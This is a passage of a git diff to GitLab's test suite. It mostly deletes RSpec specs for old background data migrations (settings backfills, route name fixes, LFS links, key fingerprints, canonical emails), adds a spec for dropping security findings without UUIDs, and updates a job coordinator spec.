expect(cleanup_schedules.find_by(merge_request_id: closed_mr_2.id).scheduled_at.to_s) - .to eq(closed_mr_2_cleanup_schedule.scheduled_at.to_s) - expect(cleanup_schedules.find_by(merge_request_id: merged_mr_1.id).scheduled_at.to_s) - .to eq((merged_mr_1_metrics.merged_at + 14.days).to_s) - expect(cleanup_schedules.find_by(merge_request_id: merged_mr_2.id).scheduled_at.to_s) - .to eq((merged_mr_2.updated_at + 14.days).to_s) - end - end - end -end diff --git a/spec/lib/gitlab/background_migration/backfill_namespace_settings_spec.rb b/spec/lib/gitlab/background_migration/backfill_namespace_settings_spec.rb deleted file mode 100644 index 0f8adca2ca4..00000000000 --- a/spec/lib/gitlab/background_migration/backfill_namespace_settings_spec.rb +++ /dev/null @@ -1,23 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::BackfillNamespaceSettings, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:namespace_settings) { table(:namespace_settings) } - let(:namespace) { table(:namespaces).create!(name: 'user', path: 'user') } - - subject { described_class.new } - - describe '#perform' do - it 'creates settings for all projects in range' do - namespaces.create!(id: 5, name: 'test1', path: 'test1') - namespaces.create!(id: 7, name: 'test2', path: 'test2') - namespaces.create!(id: 8, name: 'test3', path: 'test3') - - subject.perform(5, 7) - - expect(namespace_settings.all.pluck(:namespace_id)).to contain_exactly(5, 7) - end - end -end diff --git a/spec/lib/gitlab/background_migration/backfill_project_settings_spec.rb b/spec/lib/gitlab/background_migration/backfill_project_settings_spec.rb deleted file mode 100644 index e6b0db2ab73..00000000000 --- a/spec/lib/gitlab/background_migration/backfill_project_settings_spec.rb +++ /dev/null @@ -1,24 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::BackfillProjectSettings, schema: 20181228175414 do - 
let(:projects) { table(:projects) } - let(:project_settings) { table(:project_settings) } - let(:namespace) { table(:namespaces).create!(name: 'user', path: 'user') } - let(:project) { projects.create!(namespace_id: namespace.id) } - - subject { described_class.new } - - describe '#perform' do - it 'creates settings for all projects in range' do - projects.create!(id: 5, namespace_id: namespace.id) - projects.create!(id: 7, namespace_id: namespace.id) - projects.create!(id: 8, namespace_id: namespace.id) - - subject.perform(5, 7) - - expect(project_settings.all.pluck(:project_id)).to contain_exactly(5, 7) - end - end -end diff --git a/spec/lib/gitlab/background_migration/backfill_push_rules_id_in_projects_spec.rb b/spec/lib/gitlab/background_migration/backfill_push_rules_id_in_projects_spec.rb deleted file mode 100644 index 3468df3dccd..00000000000 --- a/spec/lib/gitlab/background_migration/backfill_push_rules_id_in_projects_spec.rb +++ /dev/null @@ -1,32 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::BackfillPushRulesIdInProjects, :migration, schema: 20181228175414 do - let(:push_rules) { table(:push_rules) } - let(:projects) { table(:projects) } - let(:project_settings) { table(:project_settings) } - let(:namespace) { table(:namespaces).create!(name: 'user', path: 'user') } - - subject { described_class.new } - - describe '#perform' do - it 'creates new project push_rules for all push rules in the range' do - project_1 = projects.create!(id: 1, namespace_id: namespace.id) - project_2 = projects.create!(id: 2, namespace_id: namespace.id) - project_3 = projects.create!(id: 3, namespace_id: namespace.id) - project_settings_1 = project_settings.create!(project_id: project_1.id) - project_settings_2 = project_settings.create!(project_id: project_2.id) - project_settings_3 = project_settings.create!(project_id: project_3.id) - push_rule_1 = push_rules.create!(id: 5, is_sample: false, project_id: 
project_1.id) - push_rule_2 = push_rules.create!(id: 6, is_sample: false, project_id: project_2.id) - push_rules.create!(id: 8, is_sample: false, project_id: 3) - - subject.perform(5, 7) - - expect(project_settings_1.reload.push_rule_id).to eq(push_rule_1.id) - expect(project_settings_2.reload.push_rule_id).to eq(push_rule_2.id) - expect(project_settings_3.reload.push_rule_id).to be_nil - end - end -end diff --git a/spec/lib/gitlab/background_migration/drop_invalid_security_findings_spec.rb b/spec/lib/gitlab/background_migration/drop_invalid_security_findings_spec.rb new file mode 100644 index 00000000000..7cc64889fc8 --- /dev/null +++ b/spec/lib/gitlab/background_migration/drop_invalid_security_findings_spec.rb @@ -0,0 +1,56 @@ +# frozen_string_literal: true +require 'spec_helper' + +RSpec.describe Gitlab::BackgroundMigration::DropInvalidSecurityFindings, schema: 20211108211434 do + let(:namespace) { table(:namespaces).create!(name: 'user', path: 'user', type: Namespaces::UserNamespace.sti_name) } + let(:project) { table(:projects).create!(namespace_id: namespace.id) } + + let(:pipelines) { table(:ci_pipelines) } + let!(:pipeline) { pipelines.create!(project_id: project.id) } + + let(:ci_builds) { table(:ci_builds) } + let!(:ci_build) { ci_builds.create! 
} + + let(:security_scans) { table(:security_scans) } + let!(:security_scan) do + security_scans.create!( + scan_type: 1, + status: 1, + build_id: ci_build.id, + project_id: project.id, + pipeline_id: pipeline.id + ) + end + + let(:vulnerability_scanners) { table(:vulnerability_scanners) } + let!(:vulnerability_scanner) { vulnerability_scanners.create!(project_id: project.id, external_id: 'test 1', name: 'test scanner 1') } + + let(:security_findings) { table(:security_findings) } + let!(:security_finding_without_uuid) do + security_findings.create!( + severity: 1, + confidence: 1, + scan_id: security_scan.id, + scanner_id: vulnerability_scanner.id, + uuid: nil + ) + end + + let!(:security_finding_with_uuid) do + security_findings.create!( + severity: 1, + confidence: 1, + scan_id: security_scan.id, + scanner_id: vulnerability_scanner.id, + uuid: 'bd95c085-71aa-51d7-9bb6-08ae669c262e' + ) + end + + let(:sub_batch_size) { 10_000 } + + subject { described_class.new.perform(security_finding_without_uuid.id, security_finding_with_uuid.id, sub_batch_size) } + + it 'drops Security::Finding objects with no UUID' do + expect { subject }.to change(security_findings, :count).from(2).to(1) + end +end diff --git a/spec/lib/gitlab/background_migration/fix_promoted_epics_discussion_ids_spec.rb b/spec/lib/gitlab/background_migration/fix_promoted_epics_discussion_ids_spec.rb deleted file mode 100644 index 35ec8be691a..00000000000 --- a/spec/lib/gitlab/background_migration/fix_promoted_epics_discussion_ids_spec.rb +++ /dev/null @@ -1,49 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::FixPromotedEpicsDiscussionIds, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:users) { table(:users) } - let(:epics) { table(:epics) } - let(:notes) { table(:notes) } - - let(:user) { users.create!(email: 'test@example.com', projects_limit: 100, username: 'test') } - let(:namespace) { namespaces.create!(name: 
'gitlab', path: 'gitlab-org') } - let(:epic1) { epics.create!(id: 1, author_id: user.id, iid: 1, group_id: namespace.id, title: 'Epic with discussion', title_html: 'Epic with discussion') } - - def create_note(discussion_id) - notes.create!(note: 'note comment', - noteable_id: epic1.id, - noteable_type: 'Epic', - discussion_id: discussion_id) - end - - def expect_valid_discussion_id(id) - expect(id).to match(/\A\h{40}\z/) - end - - describe '#perform with batch of discussion ids' do - it 'updates discussion ids' do - note1 = create_note('00000000') - note2 = create_note('00000000') - note3 = create_note('10000000') - - subject.perform(%w(00000000 10000000)) - - expect_valid_discussion_id(note1.reload.discussion_id) - expect_valid_discussion_id(note2.reload.discussion_id) - expect_valid_discussion_id(note3.reload.discussion_id) - expect(note1.discussion_id).to eq(note2.discussion_id) - expect(note1.discussion_id).not_to eq(note3.discussion_id) - end - - it 'skips notes with discussion id not in range' do - note4 = create_note('20000000') - - subject.perform(%w(00000000 10000000)) - - expect(note4.reload.discussion_id).to eq('20000000') - end - end -end diff --git a/spec/lib/gitlab/background_migration/fix_user_namespace_names_spec.rb b/spec/lib/gitlab/background_migration/fix_user_namespace_names_spec.rb deleted file mode 100644 index 95509f9b897..00000000000 --- a/spec/lib/gitlab/background_migration/fix_user_namespace_names_spec.rb +++ /dev/null @@ -1,104 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::FixUserNamespaceNames, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:users) { table(:users) } - let(:user) { users.create!(name: "The user's full name", projects_limit: 10, username: 'not-null', email: '1') } - - context 'updating the namespace names' do - it 'updates a user namespace within range' do - user2 = users.create!(name: "Other user's full name", projects_limit: 10, 
username: 'also-not-null', email: '2') - user_namespace1 = namespaces.create!( - id: 2, - owner_id: user.id, - name: "Should be the user's name", - path: user.username - ) - user_namespace2 = namespaces.create!( - id: 3, - owner_id: user2.id, - name: "Should also be the user's name", - path: user.username - ) - - described_class.new.perform(1, 5) - - expect(user_namespace1.reload.name).to eq("The user's full name") - expect(user_namespace2.reload.name).to eq("Other user's full name") - end - - it 'does not update namespaces out of range' do - user_namespace = namespaces.create!( - id: 6, - owner_id: user.id, - name: "Should be the user's name", - path: user.username - ) - - expect { described_class.new.perform(1, 5) } - .not_to change { user_namespace.reload.name } - end - - it 'does not update groups owned by the users' do - user_group = namespaces.create!( - id: 2, - owner_id: user.id, - name: 'A group name', - path: 'the-path', - type: 'Group' - ) - - expect { described_class.new.perform(1, 5) } - .not_to change { user_group.reload.name } - end - end - - context 'namespace route names' do - let(:routes) { table(:routes) } - let(:namespace) do - namespaces.create!( - id: 2, - owner_id: user.id, - name: "Will be updated to the user's name", - path: user.username - ) - end - - it "updates the route name if it didn't match the namespace" do - route = routes.create!(path: namespace.path, name: 'Incorrect name', source_type: 'Namespace', source_id: namespace.id) - - described_class.new.perform(1, 5) - - expect(route.reload.name).to eq("The user's full name") - end - - it 'updates the route name if it was nil match the namespace' do - route = routes.create!(path: namespace.path, name: nil, source_type: 'Namespace', source_id: namespace.id) - - described_class.new.perform(1, 5) - - expect(route.reload.name).to eq("The user's full name") - end - - it "doesn't update group routes" do - route = routes.create!(path: 'group-path', name: 'Group name', source_type: 'Group', 
source_id: namespace.id) - - expect { described_class.new.perform(1, 5) } - .not_to change { route.reload.name } - end - - it "doesn't touch routes for namespaces out of range" do - user_namespace = namespaces.create!( - id: 6, - owner_id: user.id, - name: "Should be the user's name", - path: user.username - ) - - expect { described_class.new.perform(1, 5) } - .not_to change { user_namespace.reload.name } - end - end -end diff --git a/spec/lib/gitlab/background_migration/fix_user_project_route_names_spec.rb b/spec/lib/gitlab/background_migration/fix_user_project_route_names_spec.rb deleted file mode 100644 index b4444df674e..00000000000 --- a/spec/lib/gitlab/background_migration/fix_user_project_route_names_spec.rb +++ /dev/null @@ -1,98 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::FixUserProjectRouteNames, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:users) { table(:users) } - let(:routes) { table(:routes) } - let(:projects) { table(:projects) } - - let(:user) { users.create!(name: "The user's full name", projects_limit: 10, username: 'not-null', email: '1') } - - let(:namespace) do - namespaces.create!( - owner_id: user.id, - name: "Should eventually be the user's name", - path: user.username - ) - end - - let(:project) do - projects.create!(namespace_id: namespace.id, name: 'Project Name') - end - - it "updates the route for a project if it did not match the user's name" do - route = routes.create!( - id: 1, - path: "#{user.username}/#{project.path}", - source_id: project.id, - source_type: 'Project', - name: 'Completely wrong' - ) - - described_class.new.perform(1, 5) - - expect(route.reload.name).to eq("The user's full name / Project Name") - end - - it 'updates the route for a project if the name was nil' do - route = routes.create!( - id: 1, - path: "#{user.username}/#{project.path}", - source_id: project.id, - source_type: 'Project', - name: nil - ) - - 
described_class.new.perform(1, 5) - - expect(route.reload.name).to eq("The user's full name / Project Name") - end - - it 'does not update routes that were are out of the range' do - route = routes.create!( - id: 6, - path: "#{user.username}/#{project.path}", - source_id: project.id, - source_type: 'Project', - name: 'Completely wrong' - ) - - expect { described_class.new.perform(1, 5) } - .not_to change { route.reload.name } - end - - it 'does not update routes for projects in groups owned by the user' do - group = namespaces.create!( - owner_id: user.id, - name: 'A group', - path: 'a-path', - type: '' - ) - project = projects.create!(namespace_id: group.id, name: 'Project Name') - route = routes.create!( - id: 1, - path: "#{group.path}/#{project.path}", - source_id: project.id, - source_type: 'Project', - name: 'Completely wrong' - ) - - expect { described_class.new.perform(1, 5) } - .not_to change { route.reload.name } - end - - it 'does not update routes for namespaces' do - route = routes.create!( - id: 1, - path: namespace.path, - source_id: namespace.id, - source_type: 'Namespace', - name: 'Completely wrong' - ) - - expect { described_class.new.perform(1, 5) } - .not_to change { route.reload.name } - end -end diff --git a/spec/lib/gitlab/background_migration/job_coordinator_spec.rb b/spec/lib/gitlab/background_migration/job_coordinator_spec.rb index a0543ca9958..7a524d1489a 100644 --- a/spec/lib/gitlab/background_migration/job_coordinator_spec.rb +++ b/spec/lib/gitlab/background_migration/job_coordinator_spec.rb @@ -3,32 +3,22 @@ require 'spec_helper' RSpec.describe Gitlab::BackgroundMigration::JobCoordinator do - let(:database) { :main } let(:worker_class) { BackgroundMigrationWorker } - let(:coordinator) { described_class.new(database, worker_class) } + let(:tracking_database) { worker_class.tracking_database } + let(:coordinator) { described_class.new(worker_class) } - describe '.for_database' do + describe '.for_tracking_database' do it 'returns an 
executor with the correct worker class and database' do - coordinator = described_class.for_database(database) + coordinator = described_class.for_tracking_database(tracking_database) - expect(coordinator.database).to eq(database) expect(coordinator.worker_class).to eq(worker_class) end - context 'when passed in as a string' do - it 'retruns an executor with the correct worker class and database' do - coordinator = described_class.for_database(database.to_s) - - expect(coordinator.database).to eq(database) - expect(coordinator.worker_class).to eq(worker_class) - end - end - context 'when an invalid value is given' do it 'raises an error' do expect do - described_class.for_database('notvalid') - end.to raise_error(ArgumentError, "database must be one of [main], got 'notvalid'") + described_class.for_tracking_database('notvalid') + end.to raise_error(ArgumentError, /tracking_database must be one of/) end end end diff --git a/spec/lib/gitlab/background_migration/link_lfs_objects_projects_spec.rb b/spec/lib/gitlab/background_migration/link_lfs_objects_projects_spec.rb deleted file mode 100644 index 64e8afedf52..00000000000 --- a/spec/lib/gitlab/background_migration/link_lfs_objects_projects_spec.rb +++ /dev/null @@ -1,113 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::LinkLfsObjectsProjects, :migration, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - let(:fork_networks) { table(:fork_networks) } - let(:fork_network_members) { table(:fork_network_members) } - let(:lfs_objects) { table(:lfs_objects) } - let(:lfs_objects_projects) { table(:lfs_objects_projects) } - - let(:namespace) { namespaces.create!(name: 'GitLab', path: 'gitlab') } - - let(:fork_network) { fork_networks.create!(root_project_id: source_project.id) } - let(:another_fork_network) { fork_networks.create!(root_project_id: another_source_project.id) } - - let(:source_project) { 
projects.create!(namespace_id: namespace.id) } - let(:another_source_project) { projects.create!(namespace_id: namespace.id) } - let(:project) { projects.create!(namespace_id: namespace.id) } - let(:another_project) { projects.create!(namespace_id: namespace.id) } - let(:partially_linked_project) { projects.create!(namespace_id: namespace.id) } - let(:fully_linked_project) { projects.create!(namespace_id: namespace.id) } - - let(:lfs_object) { lfs_objects.create!(oid: 'abc123', size: 100) } - let(:another_lfs_object) { lfs_objects.create!(oid: 'def456', size: 200) } - - let!(:source_project_lop_1) do - lfs_objects_projects.create!( - lfs_object_id: lfs_object.id, - project_id: source_project.id - ) - end - - let!(:source_project_lop_2) do - lfs_objects_projects.create!( - lfs_object_id: another_lfs_object.id, - project_id: source_project.id - ) - end - - let!(:another_source_project_lop_1) do - lfs_objects_projects.create!( - lfs_object_id: lfs_object.id, - project_id: another_source_project.id - ) - end - - let!(:another_source_project_lop_2) do - lfs_objects_projects.create!( - lfs_object_id: another_lfs_object.id, - project_id: another_source_project.id - ) - end - - before do - stub_const("#{described_class}::BATCH_SIZE", 2) - - # Create links between projects - fork_network_members.create!(fork_network_id: fork_network.id, project_id: source_project.id, forked_from_project_id: nil) - - [project, partially_linked_project, fully_linked_project].each do |p| - fork_network_members.create!( - fork_network_id: fork_network.id, - project_id: p.id, - forked_from_project_id: fork_network.root_project_id - ) - end - - fork_network_members.create!(fork_network_id: another_fork_network.id, project_id: another_source_project.id, forked_from_project_id: nil) - fork_network_members.create!(fork_network_id: another_fork_network.id, project_id: another_project.id, forked_from_project_id: another_fork_network.root_project_id) - - # Links LFS objects to some projects - 
lfs_objects_projects.create!(lfs_object_id: lfs_object.id, project_id: fully_linked_project.id) - lfs_objects_projects.create!(lfs_object_id: another_lfs_object.id, project_id: fully_linked_project.id) - lfs_objects_projects.create!(lfs_object_id: lfs_object.id, project_id: partially_linked_project.id) - end - - context 'when there are LFS objects to be linked' do - it 'creates LfsObjectsProject records for forks based on the specified range of LfsObjectProject id' do - expect_next_instance_of(Gitlab::BackgroundMigration::Logger) do |logger| - expect(logger).to receive(:info).exactly(4).times - end - - expect { subject.perform(source_project_lop_1.id, another_source_project_lop_2.id) }.to change { lfs_objects_projects.count }.by(5) - - expect(lfs_object_ids_for(project)).to match_array(lfs_object_ids_for(source_project)) - expect(lfs_object_ids_for(another_project)).to match_array(lfs_object_ids_for(another_source_project)) - expect(lfs_object_ids_for(partially_linked_project)).to match_array(lfs_object_ids_for(source_project)) - - expect { subject.perform(source_project_lop_1.id, another_source_project_lop_2.id) }.not_to change { lfs_objects_projects.count } - end - end - - context 'when there are no LFS objects to be linked' do - before do - # Links LFS objects to all projects - projects.all.each do |p| - lfs_objects_projects.create!(lfs_object_id: lfs_object.id, project_id: p.id) - lfs_objects_projects.create!(lfs_object_id: another_lfs_object.id, project_id: p.id) - end - end - - it 'does not create LfsObjectProject records' do - expect { subject.perform(source_project_lop_1.id, another_source_project_lop_2.id) } - .not_to change { lfs_objects_projects.count } - end - end - - def lfs_object_ids_for(project) - lfs_objects_projects.where(project_id: project.id).pluck(:lfs_object_id) - end -end diff --git a/spec/lib/gitlab/background_migration/migrate_fingerprint_sha256_within_keys_spec.rb 
b/spec/lib/gitlab/background_migration/migrate_fingerprint_sha256_within_keys_spec.rb deleted file mode 100644 index 4287d6723cf..00000000000 --- a/spec/lib/gitlab/background_migration/migrate_fingerprint_sha256_within_keys_spec.rb +++ /dev/null @@ -1,93 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::MigrateFingerprintSha256WithinKeys, schema: 20181228175414 do - subject(:fingerprint_migrator) { described_class.new } - - let(:key_table) { table(:keys) } - - before do - generate_fingerprints! - end - - it 'correctly creates a sha256 fingerprint for a key' do - key_1 = Key.find(1017) - key_2 = Key.find(1027) - - expect(key_1.fingerprint_md5).to eq('ba:81:59:68:d7:6c:cd:02:02:bf:6a:9b:55:4e:af:d1') - expect(key_1.fingerprint_sha256).to eq(nil) - - expect(key_2.fingerprint_md5).to eq('39:e3:64:a6:24:ea:45:a2:8c:55:2a:e9:4d:4f:1f:b4') - expect(key_2.fingerprint_sha256).to eq(nil) - - query_count = ActiveRecord::QueryRecorder.new do - fingerprint_migrator.perform(1, 10000) - end.count - - expect(query_count).to eq(8) - - key_1.reload - key_2.reload - - expect(key_1.fingerprint_md5).to eq('ba:81:59:68:d7:6c:cd:02:02:bf:6a:9b:55:4e:af:d1') - expect(key_1.fingerprint_sha256).to eq('nUhzNyftwADy8AH3wFY31tAKs7HufskYTte2aXo/lCg') - - expect(key_2.fingerprint_md5).to eq('39:e3:64:a6:24:ea:45:a2:8c:55:2a:e9:4d:4f:1f:b4') - expect(key_2.fingerprint_sha256).to eq('zMNbLekgdjtcgDv8VSC0z5lpdACMG3Q4PUoIz5+H2jM') - end - - context 'with invalid keys' do - before do - key = Key.find(1017) - # double space after "ssh-rsa" leads to a - # OpenSSL::PKey::PKeyError in Net::SSH::KeyFactory.load_data_public_key - key.update_column(:key, key.key.gsub('ssh-rsa ', 'ssh-rsa ')) - end - - it 'ignores errors and does not set the fingerprint' do - fingerprint_migrator.perform(1, 10000) - - key_1 = Key.find(1017) - key_2 = Key.find(1027) - - expect(key_1.fingerprint_sha256).to be_nil - expect(key_2.fingerprint_sha256).not_to be_nil - end 
- end - - it 'migrates all keys' do - expect(Key.where(fingerprint_sha256: nil).count).to eq(Key.all.count) - - fingerprint_migrator.perform(1, 10000) - - expect(Key.where(fingerprint_sha256: nil).count).to eq(0) - end - - def generate_fingerprints! - values = "" - (1000..2000).to_a.each do |record| - key = base_key_for(record) - fingerprint = fingerprint_for(key) - - values += "(#{record}, #{record}, 'test-#{record}', '#{key}', '#{fingerprint}')," - end - - update_query = <<~SQL - INSERT INTO keys ( id, user_id, title, key, fingerprint ) - VALUES - #{values.chomp(",")}; - SQL - - ActiveRecord::Base.connection.execute(update_query) - end - - def base_key_for(record) - 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt0000k6YjzGGphH2TUxwKzxcKDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaSeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=' - .gsub("0000", "%04d" % (record - 1)) # generate arbitrary keys with placeholder 0000 within the key above - end - - def fingerprint_for(key) - Gitlab::SSHPublicKey.new(key).fingerprint("md5") - end -end diff --git a/spec/lib/gitlab/background_migration/migrate_pages_metadata_spec.rb b/spec/lib/gitlab/background_migration/migrate_pages_metadata_spec.rb deleted file mode 100644 index b6d93b9ff54..00000000000 --- a/spec/lib/gitlab/background_migration/migrate_pages_metadata_spec.rb +++ /dev/null @@ -1,36 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::MigratePagesMetadata, schema: 20181228175414 do - let(:projects) { table(:projects) } - - subject(:migrate_pages_metadata) { described_class.new } - - describe '#perform' do - let(:namespaces) { table(:namespaces) } - let(:builds) { table(:ci_builds) } - let(:pages_metadata) { table(:project_pages_metadata) } - - it 'marks specified projects with successful pages deployment' do - namespace = namespaces.create!(name: 'gitlab', path: 'gitlab-org') - not_migrated_with_pages = 
projects.create!(namespace_id: namespace.id, name: 'Not Migrated With Pages') - builds.create!(project_id: not_migrated_with_pages.id, type: 'GenericCommitStatus', status: 'success', stage: 'deploy', name: 'pages:deploy') - - migrated = projects.create!(namespace_id: namespace.id, name: 'Migrated') - pages_metadata.create!(project_id: migrated.id, deployed: true) - - not_migrated_no_pages = projects.create!(namespace_id: namespace.id, name: 'Not Migrated No Pages') - project_not_in_relation_scope = projects.create!(namespace_id: namespace.id, name: 'Other') - - ids = [not_migrated_no_pages.id, not_migrated_with_pages.id, migrated.id] - - migrate_pages_metadata.perform(ids.min, ids.max) - - expect(pages_metadata.find_by_project_id(not_migrated_with_pages.id).deployed).to eq(true) - expect(pages_metadata.find_by_project_id(not_migrated_no_pages.id).deployed).to eq(false) - expect(pages_metadata.find_by_project_id(migrated.id).deployed).to eq(true) - expect(pages_metadata.find_by_project_id(project_not_in_relation_scope.id)).to be_nil - end - end -end diff --git a/spec/lib/gitlab/background_migration/migrate_to_hashed_storage_spec.rb b/spec/lib/gitlab/background_migration/migrate_to_hashed_storage_spec.rb deleted file mode 100644 index 0f7bb06e830..00000000000 --- a/spec/lib/gitlab/background_migration/migrate_to_hashed_storage_spec.rb +++ /dev/null @@ -1,43 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -# rubocop:disable RSpec/FactoriesInMigrationSpecs -RSpec.describe Gitlab::BackgroundMigration::MigrateToHashedStorage, :sidekiq, :redis do - let(:migrator) { Gitlab::HashedStorage::Migrator.new } - - subject(:background_migration) { described_class.new } - - describe '#perform' do - let!(:project) { create(:project, :empty_repo, :legacy_storage) } - - context 'with pending rollback' do - it 'aborts rollback operation' do - Sidekiq::Testing.disable! 
do - Sidekiq::Client.push( - 'queue' => ::HashedStorage::ProjectRollbackWorker.queue, - 'class' => ::HashedStorage::ProjectRollbackWorker, - 'args' => [project.id] - ) - - expect { background_migration.perform }.to change { migrator.rollback_pending? }.from(true).to(false) - end - end - end - - it 'enqueues legacy projects to be migrated' do - Sidekiq::Testing.fake! do - expect { background_migration.perform }.to change { Sidekiq::Queues[::HashedStorage::MigratorWorker.queue].size }.by(1) - end - end - - context 'when executing all jobs' do - it 'migrates legacy projects' do - Sidekiq::Testing.inline! do - expect { background_migration.perform }.to change { project.reload.legacy_storage? }.from(true).to(false) - end - end - end - end -end -# rubocop:enable RSpec/FactoriesInMigrationSpecs diff --git a/spec/lib/gitlab/background_migration/populate_canonical_emails_spec.rb b/spec/lib/gitlab/background_migration/populate_canonical_emails_spec.rb deleted file mode 100644 index 944ee98ed4a..00000000000 --- a/spec/lib/gitlab/background_migration/populate_canonical_emails_spec.rb +++ /dev/null @@ -1,94 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::PopulateCanonicalEmails, :migration, schema: 20181228175414 do - let(:migration) { described_class.new } - - let_it_be(:users_table) { table(:users) } - let_it_be(:user_canonical_emails_table) { table(:user_canonical_emails) } - - let_it_be(:users) { users_table.all } - let_it_be(:user_canonical_emails) { user_canonical_emails_table.all } - - subject { migration.perform(1, 1) } - - describe 'gmail users' do - using RSpec::Parameterized::TableSyntax - - where(:original_email, :expected_result) do - 'legitimateuser@gmail.com' | 'legitimateuser@gmail.com' - 'userwithplus+somestuff@gmail.com' | 'userwithplus@gmail.com' - 'user.with.periods@gmail.com' | 'userwithperiods@gmail.com' - 'user.with.periods.and.plus+someotherstuff@gmail.com' | 
'userwithperiodsandplus@gmail.com' - end - - with_them do - it 'generates the correct canonical email' do - create_user(email: original_email, id: 1) - - subject - - result = canonical_emails - expect(result.count).to eq 1 - expect(result.first).to match({ - 'user_id' => 1, - 'canonical_email' => expected_result - }) - end - end - end - - describe 'non gmail.com domain users' do - %w[ - legitimateuser@somedomain.com - userwithplus+somestuff@other.com - user.with.periods@gmail.org - user.with.periods.and.plus+someotherstuff@orangmail.com - ].each do |non_gmail_address| - it 'does not generate a canonical email' do - create_user(email: non_gmail_address, id: 1) - - subject - - expect(canonical_emails(user_id: 1).count).to eq 0 - end - end - end - - describe 'gracefully handles missing records' do - specify { expect { subject }.not_to raise_error } - end - - describe 'gracefully handles existing records, some of which may have an already-existing identical canonical_email field' do - let_it_be(:user_one) { create_user(email: "example.user@gmail.com", id: 1) } - let_it_be(:user_two) { create_user(email: "exampleuser@gmail.com", id: 2) } - let_it_be(:user_email_one) { user_canonical_emails.create!(canonical_email: "exampleuser@gmail.com", user_id: user_one.id) } - - subject { migration.perform(1, 2) } - - it 'only creates one record' do - subject - - expect(canonical_emails.count).not_to be_nil - end - end - - def create_user(attributes) - default_attributes = { - projects_limit: 0 - } - - users.create!(default_attributes.merge!(attributes)) - end - - def canonical_emails(user_id: nil) - filter_by_id = user_id ? 
"WHERE user_id = #{user_id}" : "" - - ApplicationRecord.connection.execute <<~SQL - SELECT canonical_email, user_id - FROM user_canonical_emails - #{filter_by_id}; - SQL - end -end diff --git a/spec/lib/gitlab/background_migration/populate_dismissed_state_for_vulnerabilities_spec.rb b/spec/lib/gitlab/background_migration/populate_dismissed_state_for_vulnerabilities_spec.rb deleted file mode 100644 index dc8c8c75b83..00000000000 --- a/spec/lib/gitlab/background_migration/populate_dismissed_state_for_vulnerabilities_spec.rb +++ /dev/null @@ -1,44 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe ::Gitlab::BackgroundMigration::PopulateDismissedStateForVulnerabilities, schema: 20181228175414 do - let(:users) { table(:users) } - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - let(:vulnerabilities) { table(:vulnerabilities) } - - let!(:namespace) { namespaces.create!(name: "foo", path: "bar") } - let!(:user) { users.create!(name: 'John Doe', email: 'test@example.com', projects_limit: 5) } - let!(:project) { projects.create!(namespace_id: namespace.id) } - let!(:vulnerability_params) do - { - project_id: project.id, - author_id: user.id, - title: 'Vulnerability', - severity: 5, - confidence: 5, - report_type: 5 - } - end - - let!(:vulnerability_1) { vulnerabilities.create!(vulnerability_params.merge(state: 1)) } - let!(:vulnerability_2) { vulnerabilities.create!(vulnerability_params.merge(state: 3)) } - - describe '#perform' do - it 'changes state of vulnerability to dismissed' do - subject.perform(vulnerability_1.id, vulnerability_2.id) - - expect(vulnerability_1.reload.state).to eq(2) - expect(vulnerability_2.reload.state).to eq(2) - end - - it 'populates missing dismissal information' do - expect_next_instance_of(::Gitlab::BackgroundMigration::PopulateMissingVulnerabilityDismissalInformation) do |migration| - expect(migration).to receive(:perform).with(vulnerability_1.id, vulnerability_2.id) - end - - 
subject.perform(vulnerability_1.id, vulnerability_2.id) - end - end -end diff --git a/spec/lib/gitlab/background_migration/populate_has_vulnerabilities_spec.rb b/spec/lib/gitlab/background_migration/populate_has_vulnerabilities_spec.rb deleted file mode 100644 index 6722321d5f7..00000000000 --- a/spec/lib/gitlab/background_migration/populate_has_vulnerabilities_spec.rb +++ /dev/null @@ -1,63 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::PopulateHasVulnerabilities, schema: 20181228175414 do - let(:users) { table(:users) } - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - let(:project_settings) { table(:project_settings) } - let(:vulnerabilities) { table(:vulnerabilities) } - - let(:user) { users.create!(name: 'test', email: 'test@example.com', projects_limit: 5) } - let(:namespace) { namespaces.create!(name: 'gitlab', path: 'gitlab-org') } - let(:vulnerability_base_params) { { title: 'title', state: 2, severity: 0, confidence: 5, report_type: 2, author_id: user.id } } - - let!(:project_1) { projects.create!(namespace_id: namespace.id, name: 'foo_1') } - let!(:project_2) { projects.create!(namespace_id: namespace.id, name: 'foo_2') } - let!(:project_3) { projects.create!(namespace_id: namespace.id, name: 'foo_3') } - - before do - project_settings.create!(project_id: project_1.id) - vulnerabilities.create!(vulnerability_base_params.merge(project_id: project_1.id)) - 